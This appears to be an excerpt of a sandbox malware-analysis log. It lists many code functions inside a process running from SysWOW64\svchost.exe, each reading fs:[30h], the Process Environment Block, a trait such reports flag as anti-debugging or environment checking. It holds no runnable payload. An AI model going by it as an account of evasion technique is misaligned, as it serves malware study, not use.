Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036601F8 mov eax, dword ptr fs:[00000030h] 2_2_036601F8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036F61C3 mov eax, dword ptr fs:[00000030h] 2_2_036F61C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036F61C3 mov eax, dword ptr fs:[00000030h] 2_2_036F61C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036AE1D0 mov eax, dword ptr fs:[00000030h] 2_2_036AE1D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036AE1D0 mov eax, dword ptr fs:[00000030h] 2_2_036AE1D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036AE1D0 mov ecx, dword ptr fs:[00000030h] 2_2_036AE1D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036AE1D0 mov eax, dword ptr fs:[00000030h] 2_2_036AE1D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036AE1D0 mov eax, dword ptr fs:[00000030h] 2_2_036AE1D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03670185 mov eax, dword ptr fs:[00000030h] 2_2_03670185
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036EC188 mov eax, dword ptr fs:[00000030h] 2_2_036EC188
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036EC188 mov eax, dword ptr fs:[00000030h] 2_2_036EC188
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036D4180 mov eax, dword ptr fs:[00000030h] 2_2_036D4180
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036D4180 mov eax, dword ptr fs:[00000030h] 2_2_036D4180
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036B019F mov eax, dword ptr fs:[00000030h] 2_2_036B019F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036B019F mov eax, dword ptr fs:[00000030h] 2_2_036B019F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036B019F mov eax, dword ptr fs:[00000030h] 2_2_036B019F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036B019F mov eax, dword ptr fs:[00000030h] 2_2_036B019F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0362A197 mov eax, dword ptr fs:[00000030h] 2_2_0362A197
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0362A197 mov eax, dword ptr fs:[00000030h] 2_2_0362A197
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0362A197 mov eax, dword ptr fs:[00000030h] 2_2_0362A197
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0365C073 mov eax, dword ptr fs:[00000030h] 2_2_0365C073
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03632050 mov eax, dword ptr fs:[00000030h] 2_2_03632050
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036B6050 mov eax, dword ptr fs:[00000030h] 2_2_036B6050
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0362A020 mov eax, dword ptr fs:[00000030h] 2_2_0362A020
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0362C020 mov eax, dword ptr fs:[00000030h] 2_2_0362C020
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036C6030 mov eax, dword ptr fs:[00000030h] 2_2_036C6030
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036B4000 mov ecx, dword ptr fs:[00000030h] 2_2_036B4000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036D2000 mov eax, dword ptr fs:[00000030h] 2_2_036D2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036D2000 mov eax, dword ptr fs:[00000030h] 2_2_036D2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036D2000 mov eax, dword ptr fs:[00000030h] 2_2_036D2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036D2000 mov eax, dword ptr fs:[00000030h] 2_2_036D2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036D2000 mov eax, dword ptr fs:[00000030h] 2_2_036D2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036D2000 mov eax, dword ptr fs:[00000030h] 2_2_036D2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036D2000 mov eax, dword ptr fs:[00000030h] 2_2_036D2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036D2000 mov eax, dword ptr fs:[00000030h] 2_2_036D2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0364E016 mov eax, dword ptr fs:[00000030h] 2_2_0364E016
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0364E016 mov eax, dword ptr fs:[00000030h] 2_2_0364E016
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0364E016 mov eax, dword ptr fs:[00000030h] 2_2_0364E016
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0364E016 mov eax, dword ptr fs:[00000030h] 2_2_0364E016
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0362A0E3 mov ecx, dword ptr fs:[00000030h] 2_2_0362A0E3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036380E9 mov eax, dword ptr fs:[00000030h] 2_2_036380E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036B60E0 mov eax, dword ptr fs:[00000030h] 2_2_036B60E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0362C0F0 mov eax, dword ptr fs:[00000030h] 2_2_0362C0F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036720F0 mov ecx, dword ptr fs:[00000030h] 2_2_036720F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036B20DE mov eax, dword ptr fs:[00000030h] 2_2_036B20DE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036280A0 mov eax, dword ptr fs:[00000030h] 2_2_036280A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036C80A8 mov eax, dword ptr fs:[00000030h] 2_2_036C80A8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036F60B8 mov eax, dword ptr fs:[00000030h] 2_2_036F60B8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036F60B8 mov ecx, dword ptr fs:[00000030h] 2_2_036F60B8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0363208A mov eax, dword ptr fs:[00000030h] 2_2_0363208A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03638770 mov eax, dword ptr fs:[00000030h] 2_2_03638770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03640770 mov eax, dword ptr fs:[00000030h] 2_2_03640770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03640770 mov eax, dword ptr fs:[00000030h] 2_2_03640770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03640770 mov eax, dword ptr fs:[00000030h] 2_2_03640770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03640770 mov eax, dword ptr fs:[00000030h] 2_2_03640770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03640770 mov eax, dword ptr fs:[00000030h] 2_2_03640770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03640770 mov eax, dword ptr fs:[00000030h] 2_2_03640770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03640770 mov eax, dword ptr fs:[00000030h] 2_2_03640770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03640770 mov eax, dword ptr fs:[00000030h] 2_2_03640770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03640770 mov eax, dword ptr fs:[00000030h] 2_2_03640770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03640770 mov eax, dword ptr fs:[00000030h] 2_2_03640770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03640770 mov eax, dword ptr fs:[00000030h] 2_2_03640770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03640770 mov eax, dword ptr fs:[00000030h] 2_2_03640770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0366674D mov esi, dword ptr fs:[00000030h] 2_2_0366674D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0366674D mov eax, dword ptr fs:[00000030h] 2_2_0366674D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0366674D mov eax, dword ptr fs:[00000030h] 2_2_0366674D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03630750 mov eax, dword ptr fs:[00000030h] 2_2_03630750
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036BE75D mov eax, dword ptr fs:[00000030h] 2_2_036BE75D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03672750 mov eax, dword ptr fs:[00000030h] 2_2_03672750
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03672750 mov eax, dword ptr fs:[00000030h] 2_2_03672750
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036B4755 mov eax, dword ptr fs:[00000030h] 2_2_036B4755
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0366C720 mov eax, dword ptr fs:[00000030h] 2_2_0366C720
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0366C720 mov eax, dword ptr fs:[00000030h] 2_2_0366C720
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0366273C mov eax, dword ptr fs:[00000030h] 2_2_0366273C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0366273C mov ecx, dword ptr fs:[00000030h] 2_2_0366273C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0366273C mov eax, dword ptr fs:[00000030h] 2_2_0366273C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036AC730 mov eax, dword ptr fs:[00000030h] 2_2_036AC730
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0366C700 mov eax, dword ptr fs:[00000030h] 2_2_0366C700
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03630710 mov eax, dword ptr fs:[00000030h] 2_2_03630710
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03660710 mov eax, dword ptr fs:[00000030h] 2_2_03660710
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036527ED mov eax, dword ptr fs:[00000030h] 2_2_036527ED
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036527ED mov eax, dword ptr fs:[00000030h] 2_2_036527ED
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036527ED mov eax, dword ptr fs:[00000030h] 2_2_036527ED
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036BE7E1 mov eax, dword ptr fs:[00000030h] 2_2_036BE7E1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036347FB mov eax, dword ptr fs:[00000030h] 2_2_036347FB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036347FB mov eax, dword ptr fs:[00000030h] 2_2_036347FB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0363C7C0 mov eax, dword ptr fs:[00000030h] 2_2_0363C7C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036B07C3 mov eax, dword ptr fs:[00000030h] 2_2_036B07C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036307AF mov eax, dword ptr fs:[00000030h] 2_2_036307AF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036E47A0 mov eax, dword ptr fs:[00000030h] 2_2_036E47A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036D678E mov eax, dword ptr fs:[00000030h] 2_2_036D678E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036F866E mov eax, dword ptr fs:[00000030h] 2_2_036F866E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036F866E mov eax, dword ptr fs:[00000030h] 2_2_036F866E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0366A660 mov eax, dword ptr fs:[00000030h] 2_2_0366A660
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0366A660 mov eax, dword ptr fs:[00000030h] 2_2_0366A660
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03662674 mov eax, dword ptr fs:[00000030h] 2_2_03662674
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0364C640 mov eax, dword ptr fs:[00000030h] 2_2_0364C640
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0364E627 mov eax, dword ptr fs:[00000030h] 2_2_0364E627
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03666620 mov eax, dword ptr fs:[00000030h] 2_2_03666620
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03668620 mov eax, dword ptr fs:[00000030h] 2_2_03668620
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0363262C mov eax, dword ptr fs:[00000030h] 2_2_0363262C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036AE609 mov eax, dword ptr fs:[00000030h] 2_2_036AE609
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0364260B mov eax, dword ptr fs:[00000030h] 2_2_0364260B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0364260B mov eax, dword ptr fs:[00000030h] 2_2_0364260B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0364260B mov eax, dword ptr fs:[00000030h] 2_2_0364260B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0364260B mov eax, dword ptr fs:[00000030h] 2_2_0364260B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0364260B mov eax, dword ptr fs:[00000030h] 2_2_0364260B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0364260B mov eax, dword ptr fs:[00000030h] 2_2_0364260B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0364260B mov eax, dword ptr fs:[00000030h] 2_2_0364260B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03672619 mov eax, dword ptr fs:[00000030h] 2_2_03672619
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036AE6F2 mov eax, dword ptr fs:[00000030h] 2_2_036AE6F2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036AE6F2 mov eax, dword ptr fs:[00000030h] 2_2_036AE6F2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036AE6F2 mov eax, dword ptr fs:[00000030h] 2_2_036AE6F2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036AE6F2 mov eax, dword ptr fs:[00000030h] 2_2_036AE6F2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036B06F1 mov eax, dword ptr fs:[00000030h] 2_2_036B06F1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036B06F1 mov eax, dword ptr fs:[00000030h] 2_2_036B06F1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0366A6C7 mov ebx, dword ptr fs:[00000030h] 2_2_0366A6C7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0366A6C7 mov eax, dword ptr fs:[00000030h] 2_2_0366A6C7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0366C6A6 mov eax, dword ptr fs:[00000030h] 2_2_0366C6A6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036666B0 mov eax, dword ptr fs:[00000030h] 2_2_036666B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03634690 mov eax, dword ptr fs:[00000030h] 2_2_03634690
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03634690 mov eax, dword ptr fs:[00000030h] 2_2_03634690
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0366656A mov eax, dword ptr fs:[00000030h] 2_2_0366656A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0366656A mov eax, dword ptr fs:[00000030h] 2_2_0366656A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0366656A mov eax, dword ptr fs:[00000030h] 2_2_0366656A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03638550 mov eax, dword ptr fs:[00000030h] 2_2_03638550
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03638550 mov eax, dword ptr fs:[00000030h] 2_2_03638550
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03640535 mov eax, dword ptr fs:[00000030h] 2_2_03640535
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03640535 mov eax, dword ptr fs:[00000030h] 2_2_03640535
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03640535 mov eax, dword ptr fs:[00000030h] 2_2_03640535
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03640535 mov eax, dword ptr fs:[00000030h] 2_2_03640535
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03640535 mov eax, dword ptr fs:[00000030h] 2_2_03640535
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03640535 mov eax, dword ptr fs:[00000030h] 2_2_03640535
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0365E53E mov eax, dword ptr fs:[00000030h] 2_2_0365E53E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0365E53E mov eax, dword ptr fs:[00000030h] 2_2_0365E53E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0365E53E mov eax, dword ptr fs:[00000030h] 2_2_0365E53E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0365E53E mov eax, dword ptr fs:[00000030h] 2_2_0365E53E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0365E53E mov eax, dword ptr fs:[00000030h] 2_2_0365E53E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036C6500 mov eax, dword ptr fs:[00000030h] 2_2_036C6500
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03704500 mov eax, dword ptr fs:[00000030h] 2_2_03704500
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03704500 mov eax, dword ptr fs:[00000030h] 2_2_03704500
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03704500 mov eax, dword ptr fs:[00000030h] 2_2_03704500
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03704500 mov eax, dword ptr fs:[00000030h] 2_2_03704500
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03704500 mov eax, dword ptr fs:[00000030h] 2_2_03704500
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03704500 mov eax, dword ptr fs:[00000030h] 2_2_03704500
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03704500 mov eax, dword ptr fs:[00000030h] 2_2_03704500
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0365E5E7 mov eax, dword ptr fs:[00000030h] 2_2_0365E5E7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0365E5E7 mov eax, dword ptr fs:[00000030h] 2_2_0365E5E7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0365E5E7 mov eax, dword ptr fs:[00000030h] 2_2_0365E5E7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0365E5E7 mov eax, dword ptr fs:[00000030h] 2_2_0365E5E7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0365E5E7 mov eax, dword ptr fs:[00000030h] 2_2_0365E5E7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0365E5E7 mov eax, dword ptr fs:[00000030h] 2_2_0365E5E7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0365E5E7 mov eax, dword ptr fs:[00000030h] 2_2_0365E5E7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0365E5E7 mov eax, dword ptr fs:[00000030h] 2_2_0365E5E7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036325E0 mov eax, dword ptr fs:[00000030h] 2_2_036325E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0366C5ED mov eax, dword ptr fs:[00000030h] 2_2_0366C5ED
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0366C5ED mov eax, dword ptr fs:[00000030h] 2_2_0366C5ED
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0366E5CF mov eax, dword ptr fs:[00000030h] 2_2_0366E5CF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0366E5CF mov eax, dword ptr fs:[00000030h] 2_2_0366E5CF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036365D0 mov eax, dword ptr fs:[00000030h] 2_2_036365D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0366A5D0 mov eax, dword ptr fs:[00000030h] 2_2_0366A5D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0366A5D0 mov eax, dword ptr fs:[00000030h] 2_2_0366A5D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036B05A7 mov eax, dword ptr fs:[00000030h] 2_2_036B05A7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036B05A7 mov eax, dword ptr fs:[00000030h] 2_2_036B05A7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036B05A7 mov eax, dword ptr fs:[00000030h] 2_2_036B05A7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036545B1 mov eax, dword ptr fs:[00000030h] 2_2_036545B1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036545B1 mov eax, dword ptr fs:[00000030h] 2_2_036545B1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03632582 mov eax, dword ptr fs:[00000030h] 2_2_03632582
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03632582 mov ecx, dword ptr fs:[00000030h] 2_2_03632582
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03664588 mov eax, dword ptr fs:[00000030h] 2_2_03664588
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0366E59C mov eax, dword ptr fs:[00000030h] 2_2_0366E59C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036BC460 mov ecx, dword ptr fs:[00000030h] 2_2_036BC460
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0365A470 mov eax, dword ptr fs:[00000030h] 2_2_0365A470
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0365A470 mov eax, dword ptr fs:[00000030h] 2_2_0365A470
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0365A470 mov eax, dword ptr fs:[00000030h] 2_2_0365A470
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0366E443 mov eax, dword ptr fs:[00000030h] 2_2_0366E443
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0366E443 mov eax, dword ptr fs:[00000030h] 2_2_0366E443
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0366E443 mov eax, dword ptr fs:[00000030h] 2_2_0366E443
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0366E443 mov eax, dword ptr fs:[00000030h] 2_2_0366E443
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0366E443 mov eax, dword ptr fs:[00000030h] 2_2_0366E443
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0366E443 mov eax, dword ptr fs:[00000030h] 2_2_0366E443
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0366E443 mov eax, dword ptr fs:[00000030h] 2_2_0366E443
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0366E443 mov eax, dword ptr fs:[00000030h] 2_2_0366E443
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036EA456 mov eax, dword ptr fs:[00000030h] 2_2_036EA456
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0362645D mov eax, dword ptr fs:[00000030h] 2_2_0362645D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0365245A mov eax, dword ptr fs:[00000030h] 2_2_0365245A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0362E420 mov eax, dword ptr fs:[00000030h] 2_2_0362E420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0362E420 mov eax, dword ptr fs:[00000030h] 2_2_0362E420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0362E420 mov eax, dword ptr fs:[00000030h] 2_2_0362E420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0362C427 mov eax, dword ptr fs:[00000030h] 2_2_0362C427
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036B6420 mov eax, dword ptr fs:[00000030h] 2_2_036B6420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036B6420 mov eax, dword ptr fs:[00000030h] 2_2_036B6420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036B6420 mov eax, dword ptr fs:[00000030h] 2_2_036B6420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036B6420 mov eax, dword ptr fs:[00000030h] 2_2_036B6420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036B6420 mov eax, dword ptr fs:[00000030h] 2_2_036B6420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036B6420 mov eax, dword ptr fs:[00000030h] 2_2_036B6420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036B6420 mov eax, dword ptr fs:[00000030h] 2_2_036B6420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0366A430 mov eax, dword ptr fs:[00000030h] 2_2_0366A430
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03668402 mov eax, dword ptr fs:[00000030h] 2_2_03668402
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03668402 mov eax, dword ptr fs:[00000030h] 2_2_03668402
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03668402 mov eax, dword ptr fs:[00000030h] 2_2_03668402
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036304E5 mov ecx, dword ptr fs:[00000030h] 2_2_036304E5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036364AB mov eax, dword ptr fs:[00000030h] 2_2_036364AB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036644B0 mov ecx, dword ptr fs:[00000030h] 2_2_036644B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036BA4B0 mov eax, dword ptr fs:[00000030h] 2_2_036BA4B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036EA49A mov eax, dword ptr fs:[00000030h] 2_2_036EA49A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0362CB7E mov eax, dword ptr fs:[00000030h] 2_2_0362CB7E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036E4B4B mov eax, dword ptr fs:[00000030h] 2_2_036E4B4B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036E4B4B mov eax, dword ptr fs:[00000030h] 2_2_036E4B4B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03702B57 mov eax, dword ptr fs:[00000030h] 2_2_03702B57
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03702B57 mov eax, dword ptr fs:[00000030h] 2_2_03702B57
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03702B57 mov eax, dword ptr fs:[00000030h] 2_2_03702B57
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03702B57 mov eax, dword ptr fs:[00000030h] 2_2_03702B57
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036C6B40 mov eax, dword ptr fs:[00000030h] 2_2_036C6B40
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036C6B40 mov eax, dword ptr fs:[00000030h] 2_2_036C6B40
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036FAB40 mov eax, dword ptr fs:[00000030h] 2_2_036FAB40
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036D8B42 mov eax, dword ptr fs:[00000030h] 2_2_036D8B42
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03628B50 mov eax, dword ptr fs:[00000030h] 2_2_03628B50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036DEB50 mov eax, dword ptr fs:[00000030h] 2_2_036DEB50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0365EB20 mov eax, dword ptr fs:[00000030h] 2_2_0365EB20
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0365EB20 mov eax, dword ptr fs:[00000030h] 2_2_0365EB20
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036F8B28 mov eax, dword ptr fs:[00000030h] 2_2_036F8B28
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036F8B28 mov eax, dword ptr fs:[00000030h] 2_2_036F8B28
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03704B00 mov eax, dword ptr fs:[00000030h] 2_2_03704B00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036AEB1D mov eax, dword ptr fs:[00000030h] 2_2_036AEB1D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036AEB1D mov eax, dword ptr fs:[00000030h] 2_2_036AEB1D
